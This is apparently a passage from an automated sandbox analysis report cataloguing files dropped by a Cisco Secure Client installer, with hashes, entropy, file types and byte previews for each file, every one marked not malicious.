                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...-...-.....].6.....pHYs...#...#.x.?v.. .IDATx....UU..7bJ_..I&.:p..#.D.2...vOU...y......I.E0...LK ...T...E_.o.H^.......QG..Hy%v.=...;....wj..Ru.>g....}._R..U..s....^{.!.....F.!&..7~.ip....G.......n..$..-.PS..%..~.)..._i.%..A.....[.<.W.P..D.S.0]+...)U..A.>..F.V (Z.RS.s.i.tMy.'S\1;(.C..}...(Z.PS.s..+Pi.tY..B....;...H..h... R..w.]T\t.p."..N,.P.rDM..Q:..8...|K..........._.G..d.Dk.D...'+.E.P.2.L.7..\..1|..8~...&.0...L.a..1......s..'N.......;.O..L|}.4E.uam.1..Q(Z.c.P5&qt...........n...p~.*'O.&z........q~..A..b..,.P.2...\...QA...6.qM.'.(.)[.........z.X.B....C.l@."2..P.9*....$&...n.@..Bv....#b..W..n..9&..E.....!._Q}...R..b....G.g........w\..8.W....Wz.;.~~....2W.$.*....=..).U..TT Z..>.;....q.".hf.+.(Z.#C..B.%a...a.4Q?g*.T..l.;GD{...0..u.......r...!`.P.Y.t..A..H......h.LT...B........v)`.BH.W.P.b".X!/.p.b..;... .....hm..6.O...VD...\.......PB..............M..!...tU9.u_/..'L.....]'.A.2$.j .j..{....7..i.kaBG.6...e@M..IY..x..+V.....@..

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\umbrella_logo_72.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2465
                                                                                                                                      Entropy (8bit):7.9078675566370515
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:OSjMqJt67atsaB2Q95MFMQQYs/7uI2/D8:OSd+7OsTQTuQYszIb8
                                                                                                                                      MD5:161092451DAE50221183377F7CFB560E
                                                                                                                                      SHA1:2884EE1CAD503614512FAF274C3E0AC209F9201B
                                                                                                                                      SHA-256:8CB267EF7B475567CF0A347A4E99CC533102789A966B7285A7733FD8E4FBDE47
                                                                                                                                      SHA-512:0BD327894C7A1AFC5AF1B3CD1D678370C568DF1A06A32408B4A4A3047A846657EDC09A1A0E094565EF4004DF6FEE3FBF0A2885FE0279F4920CB91FBE1D897B14
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...H...H.....U.G....pHYs...........~....SIDATx..\.l.U...d..v..P(t[..DDJ....-..."...5....1T.Q"i..?.....jK..ZS....) .*..6........s...e.3o...........s..{.*r... ..2.(.o}|..."...6l..]n....y..t".ID.D...l..ql;vt.y...u\g..:..+{......I5DT..5.t...!....8)K.:RS..!..-...S.0....e[..*8Y...E)A......H...y.yL%*.uU..S].>AV.'.\%QJ..&..)z...s.U|.!...i..5....e. .?.S*#.t....#..m...ol.D.7..CM..B.WM%|.L...E.)..P..6...A.V.d. .?....T3oF.=...JJL.qI....C.{..v..W.}.PS..........#........n%=.`.]}.._H...S..l.eL.5.9..;...x.....!).....T...q.....<.VU...n..J....i....g.{.m2$.61.9.....I..&7k.*.|.'m5s.).]...7....`n$.$C.....X!)....a......9..q...0......$..9.....A......!m...:.{.....T..LZ.....&|.H...A.0..8.O....?".,..N.V..._6R...X`.w...gx.5U....I..OIV.J...z.i.H..k...\..U.. >}..A`yi...Ct.y..8..#@Q8.'&.KK.D0y...2..i..$....Q...."j.....[Fg..0....,(9o.".8]S.#.9"ZSY.....Dtu_..ZO...G.9f.".(.$M.t+...e9&...L..NDk....$......|.l~..O`.....G...'.,`.D3...*.\.g.VEqQ."..C..,.*9..M.y..~."..A.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\unpinned.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 38 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3638
                                                                                                                                      Entropy (8bit):7.889316799889741
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:TSDZ/I09Da01l+gmkyTt6Hk8nTH6gOjEda8+nWKHD:TSDS0tKg9E05THXOodrpKHD
                                                                                                                                      MD5:ADDC960D6A70987420055E0DEBCF4250
                                                                                                                                      SHA1:AF1D0C9386C1ADC774FC167F69B89637F414BED9
                                                                                                                                      SHA-256:B19F731C03166DB50BA5E0F0AD70A48E1223E7DD57B051A3DFB8CC23FBFAB482
                                                                                                                                      SHA-512:8F6D2CFA6BF8406CB2954029C0A43F3871C2C35E19CC0580925D4E847BFC6377749AB2A3FBF8CA030D55AEC3729AED6F54F7D7534A593A24927C8E274A811E1D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...&.........@.ln....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\unpinned_button.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 38 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4370
                                                                                                                                      Entropy (8bit):7.900909498577029
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:TSDZ/I09Da01l+gmkyTt6Hk8nTcm/smdB4cT3NGDBWPryd:TSDS0tKg9E05Tcm/smAkMEPed
                                                                                                                                      MD5:CE71A3CEA2599D3A31ACAA9B55CA11E7
                                                                                                                                      SHA1:0592CF53E554F95BC722A21AF3CC9DF896BB6108
                                                                                                                                      SHA-256:0E0CF343355B77AA93DC0AFA9AFF96FF64EF5DFE73E9AAB57ECAA776BEC7EE7A
                                                                                                                                      SHA-512:D04AF6ED7247BCF61C969C1668A0F8F62CBA4A83E08CCFAE63755F56A4F6D49F9B1E39FABB10A3C04675828379658AE8FE414AC7682F7211C4A5F8949224E7EF
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...&.........@.ln....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\vpn_connected.ico (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5558
                                                                                                                                      Entropy (8bit):4.450533821817726
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:vcn7ngbW2IU8R9Lq+LhfSnuX31xEqxpkg:E74IU8R9LqMTFxz
                                                                                                                                      MD5:EAF0F00DA8BB1D384B8A5BB3B82D0A54
                                                                                                                                      SHA1:2E7021D20D962F4568A51757B2D9B7408624740E
                                                                                                                                      SHA-256:86D5102E01D6D29D5AEE6E87E827B8C624D7B552035C9AFDB0BE2B120E4A553F
                                                                                                                                      SHA-512:57358DEA1B8A75A8FEEE29F9D83931D65672B228B93CE6C9CFEEBA3C77FD9FDB8D7B7D4A1F3188D8CBC2FEBF8B427F574791E6210580499788FF101641C01854
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...... .... .(...&......... .h...N...(... ...@..... ........................................................................ ...`...................................................................................................................p.........................................................~...~...}...}...}....0........................................`................z]J.M'..'....hm.)...................................................................................................z]J.M'..M'..M'..M'..'...%x}.+...............................................................................................M'..M'..M'...kY..............x}.....!....................................................................................xh.M'..M'..z]J.....................8y}.4...#................................................................................xh.M'..M'..............................Az~.=...%......................................................................p........M'..M'

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\vpn_logo.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):9736
                                                                                                                                      Entropy (8bit):7.95835565935799
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:uGw9FbNic2CTLMZgb0OeuEqR0+zipNb19+MUs2b4uLbFv7MLlELHz5FijB:uZ95jOAdE+0+mpNB9dObfR4LiLHz5QjB
                                                                                                                                      MD5:64C1592AB32B98889AFDB7F216B3A535
                                                                                                                                      SHA1:9DA1BF63D0E9CCF65BA0C72E615099AD30DDB2EB
                                                                                                                                      SHA-256:B649B2B24F635758C6B424EBADA07097ABB56CE73E46F056268004D79575AA8F
                                                                                                                                      SHA-512:CA8376AEB64FE49CE253BEE7F949AEBFDB6C1EAD6270C739B09751CEEA313407F7AABBA7388E4ABFA53A48A322D827EF6D4FF1D458C3FB815239407646D53C84
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...-...-.....].6.....pHYs...#...#.x.?v.. .IDATx......}....j'.b.*A...H.8B.p....IXM.Q....db..D...!.*#aI..J.h..M"k?...k..t.......+!j...T7.N.y9.r........o..e......{.....?...B..\i...... ........T...u ~.h...J.4..%"..k.^...O.....".....v...+7...........M....J.z....E..(...0M+.S.R"._.2.Y..h...J.+J.+.*.@..-5....T.......E+.4WZG)q.H...k.]..|C...*,.P.O9.72{.......]y.....}J.:Dd;C.|@..8J.....rEh.......c..|?......A.D}....J.[...<E.C)y.....J.A.. i...&8.3y...t.x.9bx .6......W..&......zV^9......e..VFPA..$..b...4q.L...&..R.....7.....aK..A...........6%V....=A.f.2$Ve.ue={.8....#.....7..V.P..FE9..#> ..OuDj...ME......*....+](Z).\i]...H#....>E....N**pb..>+;....X.....z6...E+aT..L.U.."5..YtS...l[....'..u..qsV.k..h%DM..(l...u.5.e.YN.H.'&.C......Qbu.....EA.....l......!.Um......Q....n.b.*.l{t.<.+l..B{.W.P.".E..V,..._.@....... X.Y6F......}i..j.rUY.@'v \k7<.&.b....V..+....-Vn..g..X.d\.ak..K...U.@...ZToS...........,8np.....l..G.P.|.r.MA.B)V..."....

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\vpn_logo_72.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2002
                                                                                                                                      Entropy (8bit):7.874049849617631
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:aYtizXuhGfrlz7ES0+AXMzboB3CiWBgvnUeHAG:nkVFNA8Pq39/UegG
                                                                                                                                      MD5:513D5EA87AFF39BFAC791F6A1AEA44B6
                                                                                                                                      SHA1:1858020A95D380478119D11C567D686B3097CEC7
                                                                                                                                      SHA-256:E04B608228DB3AB98917F8B62BB3F64FFBC6E272FFD2B84B2CEB752838FE4485
                                                                                                                                      SHA-512:2F26AECB0AE3B423B79B4EFDF7CFF8535236E62102F0F4DB9C98A88243B3B1A6EE5CB30F6D049FC3F5E19ABBF22C5DF19805ACB2F7FD3BEB77D7D33AA351E5D5
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...H...H.....U.G....pHYs...........~.....IDATx..{lSU...vK.nl%.6..... ...0.q#D.?d....C1!j..G.Q0.,A:b.q..5d...L%...H..I@.9..B.G..E.=.SN.n....n.&..]...........A1..Z\BD6"..G.?..AD.~....l?...G...Z.KD.DTAD%.{.V,a....(#=..{..a:........)/.H-Dt..l.f....l-.p(5.;.ge2 E.K.....ro?....9v.9.....r.m...8.-.....JW.....K............\..]OP..R...lz...J...|P..uP.-.*..J3 ...Ui.......OxcK..@...L.Bl..8....{M.b...m.b.1....^.(...UG.M..2[..x..k.[K;.=G.SR5.....Fh{...|..qo..8....PR._0[..&...SR....^..(M.d6.B .Lek...<j;}.r.s..k........q8M........z..5..MkV/..?]J......kw8.B.b..:...qW...U.g^..O.}.|/$@.s..0].r..twR..o.7.....4.J.Gs-6.....C.@..Ho8.s..0u...{..r3.Ri.S.U.B....Vm...Y...9.K}.`..7U..y..I.....j................+..d.p].'.>.O..U.....<....F..X.....9.M..5w....e>@wO[.<C).r.|.Z.....e.....t..>............E].N:xa...,)Y....T4.a.~.U..0.^U8.A..............|Y.....@O...)?)..9.v^...W.#.2-M.:M.@..O.......l....T..L.....,..P.''...E...ZUX@-..P.V&eX.......M*...<.c+.A....K...V.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\csc_ui_setup.dll (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):328808
                                                                                                                                      Entropy (8bit):6.41821402390606
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:VVLKYsv1i9CFGc8FZlkTPDB25C67bAOxAwArOU:VA1i9CFGcIZ6BsbkwAiU
                                                                                                                                      MD5:91F373CDC458934ADAB159BE8A7E5DCC
                                                                                                                                      SHA1:478AB55BCF5567BC3DAF208BD6F93814CC209C4A
                                                                                                                                      SHA-256:3E8F341ECFE24B6858A8E6EFD620CAE1F4D8C1F54B66FA20D7A8E9D97B5C1397
                                                                                                                                      SHA-512:1A1725C2AB15C9A16052F19F34BA9070ADE15A98F240220E74D5D21915EA296F2F14D7CA112A0AF9573E94D1A60DD79E38D1328888ECDB5DC0EA0690BD9E32D7
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........u.:...i...i...i...h...i...h...i...h...iy`.h...iy`.h...iy`.h...i...h...i...h...i...i-..i{`.h...i{`.h...i{`ii...i...i...i{`.h...iRich...i........PE..L...n..d...........!.........0............................................................@A................................l...d.......................hH.......)..0...T...............................@............................................text...Z........................... ..`.rdata..............................@..@.data................x..............@....rsrc...............................@..@.reloc...).......*..................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\is-T9GPQ.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):328808
                                                                                                                                      Entropy (8bit):6.41821402390606
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:VVLKYsv1i9CFGc8FZlkTPDB25C67bAOxAwArOU:VA1i9CFGcIZ6BsbkwAiU
                                                                                                                                      MD5:91F373CDC458934ADAB159BE8A7E5DCC
                                                                                                                                      SHA1:478AB55BCF5567BC3DAF208BD6F93814CC209C4A
                                                                                                                                      SHA-256:3E8F341ECFE24B6858A8E6EFD620CAE1F4D8C1F54B66FA20D7A8E9D97B5C1397
                                                                                                                                      SHA-512:1A1725C2AB15C9A16052F19F34BA9070ADE15A98F240220E74D5D21915EA296F2F14D7CA112A0AF9573E94D1A60DD79E38D1328888ECDB5DC0EA0690BD9E32D7
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........u.:...i...i...i...h...i...h...i...h...iy`.h...iy`.h...iy`.h...i...h...i...h...i...i-..i{`.h...i{`.h...i{`ii...i...i...i{`.h...iRich...i........PE..L...n..d...........!.........0............................................................@A................................l...d.......................hH.......)..0...T...............................@............................................text...Z........................... ..`.rdata..............................@..@.data................x..............@....rsrc...............................@..@.reloc...).......*..................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\csc_ui.exe (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3058280
                                                                                                                                      Entropy (8bit):6.02927936674107
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:49152:I4MfZ031DVdQtj3IDJyfxR6oSmmr2E2y/dVevljoZj8OdoiM/dBVxfkT2vfsLt70:mR3IDJy5R6Smr9/jevlj67KBVxfkQ
                                                                                                                                      MD5:24DE4ED3FF1FA997F867B591BE4E001D
                                                                                                                                      SHA1:744D45EBD394880598B597D882AE2B634B9261FB
                                                                                                                                      SHA-256:7C4330C4BD0C6890C7EFC49AF493056B92332C65BE2BF885CD2A599369BA5349
                                                                                                                                      SHA-512:8A32756CFFCD10D6DF5F0B6DA917A203115431FE101B2B7746B1D8E76956B12F6AF5CE89BCE29BC505558943F4D661D45E2630B4B5790625B968549146EBEC88
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........[...5Y..5Y..5Y.6X..5Y.0X..5Y..1X..5Y..6X..5Y.1X..5Y..0X..5Y..0X..5Y.4X..5Y..4Y..5Y..<XZ.5Y...Y..5Y..Y..5Y..7X..5YRich..5Y................PE..L......d.................\...(...............p....@.................................../...@..................................n..h.....#..Y...........b..hH...@,.<d......T...................@.......h...@............p..|............................text....Z.......\.................. ..`.rdata...(...p...*...`..............@..@.data....<..........................@....rsrc....Y....#..Z....#.............@..@.reloc..<d...@,..f....+.............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\csc_ui_toast.dll (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):124520
                                                                                                                                      Entropy (8bit):6.630785150590808
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:G32Q9YYQbxksfyuSq/NyDbUzb7DCp+iSc9lxma:IhvQSphq/M8vpc9ia
                                                                                                                                      MD5:0B9FFCA43DA7770F1D5C77C7E9B9B3FE
                                                                                                                                      SHA1:F4FF02AC97542DAA7AFFA5AF61E956752CCE1809
                                                                                                                                      SHA-256:329F104D7F9E76BC20CAF68BA7AFC081B7E85EC9DF50E42C715CED146DDF4041
                                                                                                                                      SHA-512:15F52C15D6A9BFCFA2EAC5045E1DE6087A2222ACD701C7DD2376C3178659C6D83D26E6AED1AF8DD2EF1E8F493B10E4EFE13010C8C670627C748890FFE160917C
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Y....v...v...v.......v......v......>v.......v.......v.......v.......v....q..v...v..Dv.......v.......v.......v...vu..v.......v..Rich.v..........PE..L......d...........!................PF..............................................q.....@A.........................y..$....z..d.......................hH...........a..T...........................Hb..@...............4............................text............................... ..`.rdata..Pr.......t..................@..@.data................l..............@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\is-1KC0P.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):124520
                                                                                                                                      Entropy (8bit):6.630785150590808
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:G32Q9YYQbxksfyuSq/NyDbUzb7DCp+iSc9lxma:IhvQSphq/M8vpc9ia
                                                                                                                                      MD5:0B9FFCA43DA7770F1D5C77C7E9B9B3FE
                                                                                                                                      SHA1:F4FF02AC97542DAA7AFFA5AF61E956752CCE1809
                                                                                                                                      SHA-256:329F104D7F9E76BC20CAF68BA7AFC081B7E85EC9DF50E42C715CED146DDF4041
                                                                                                                                      SHA-512:15F52C15D6A9BFCFA2EAC5045E1DE6087A2222ACD701C7DD2376C3178659C6D83D26E6AED1AF8DD2EF1E8F493B10E4EFE13010C8C670627C748890FFE160917C
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Y....v...v...v.......v......v......>v.......v.......v.......v.......v....q..v...v..Dv.......v.......v.......v...vu..v.......v..Rich.v..........PE..L......d...........!................PF..............................................q.....@A.........................y..$....z..d.......................hH...........a..T...........................Hb..@...............4............................text............................... ..`.rdata..Pr.......t..................@..@.data................l..............@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\is-RN0PK.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3058280
                                                                                                                                      Entropy (8bit):6.02927936674107
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:49152:I4MfZ031DVdQtj3IDJyfxR6oSmmr2E2y/dVevljoZj8OdoiM/dBVxfkT2vfsLt70:mR3IDJy5R6Smr9/jevlj67KBVxfkQ
                                                                                                                                      MD5:24DE4ED3FF1FA997F867B591BE4E001D
                                                                                                                                      SHA1:744D45EBD394880598B597D882AE2B634B9261FB
                                                                                                                                      SHA-256:7C4330C4BD0C6890C7EFC49AF493056B92332C65BE2BF885CD2A599369BA5349
                                                                                                                                      SHA-512:8A32756CFFCD10D6DF5F0B6DA917A203115431FE101B2B7746B1D8E76956B12F6AF5CE89BCE29BC505558943F4D661D45E2630B4B5790625B968549146EBEC88
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........[...5Y..5Y..5Y.6X..5Y.0X..5Y..1X..5Y..6X..5Y.1X..5Y..0X..5Y..0X..5Y.4X..5Y..4Y..5Y..<XZ.5Y...Y..5Y..Y..5Y..7X..5YRich..5Y................PE..L......d.................\...(...............p....@.................................../...@..................................n..h.....#..Y...........b..hH...@,.<d......T...................@.......h...@............p..|............................text....Z.......\.................. ..`.rdata...(...p...*...`..............@..@.data....<..........................@....rsrc....Y....#..Z....#.............@..@.reloc..<d...@,..f....+.............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\l10n\cs-cz\LC_MESSAGES\SecureClientDefault.mo (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):350819
                                                                                                                                      Entropy (8bit):5.461097780903613
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:LjH3U1ogMmeb7oVBKIuDVKuAYjG+chxEb1XVnh2MR+5+dJT8eRrDIpFmv0K1t:LjH3UKuVVBKfKh+qMR+5+dJTXDX1t
                                                                                                                                      MD5:2967DEC829A8EB7B1B28EDE05C47DCB8
                                                                                                                                      SHA1:F02FD55BF471D0BC97FE6F71ABC0A795B9C87475
                                                                                                                                      SHA-256:105BEB70A051B9C21C5C98EAB6F3C3E5EC01A54D6FDF25E86FD5BC9F113362DF
                                                                                                                                      SHA-512:A79CC293592DEF70B0C9EC83874DF23B4FA71DCAAA5C5656B2B0533BC7A91BCC8A65FCBF48124FD2E49D9CCA4B373E03F8294805F76BA19742377DA6856928FE
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\l10n\cs-cz\LC_MESSAGES\is-H50FQ.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):350819
                                                                                                                                      Entropy (8bit):5.461097780903613
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:LjH3U1ogMmeb7oVBKIuDVKuAYjG+chxEb1XVnh2MR+5+dJT8eRrDIpFmv0K1t:LjH3UKuVVBKfKh+qMR+5+dJTXDX1t
                                                                                                                                      MD5:2967DEC829A8EB7B1B28EDE05C47DCB8
                                                                                                                                      SHA1:F02FD55BF471D0BC97FE6F71ABC0A795B9C87475
                                                                                                                                      SHA-256:105BEB70A051B9C21C5C98EAB6F3C3E5EC01A54D6FDF25E86FD5BC9F113362DF
                                                                                                                                      SHA-512:A79CC293592DEF70B0C9EC83874DF23B4FA71DCAAA5C5656B2B0533BC7A91BCC8A65FCBF48124FD2E49D9CCA4B373E03F8294805F76BA19742377DA6856928FE
                                                                                                                                      Malicious:false
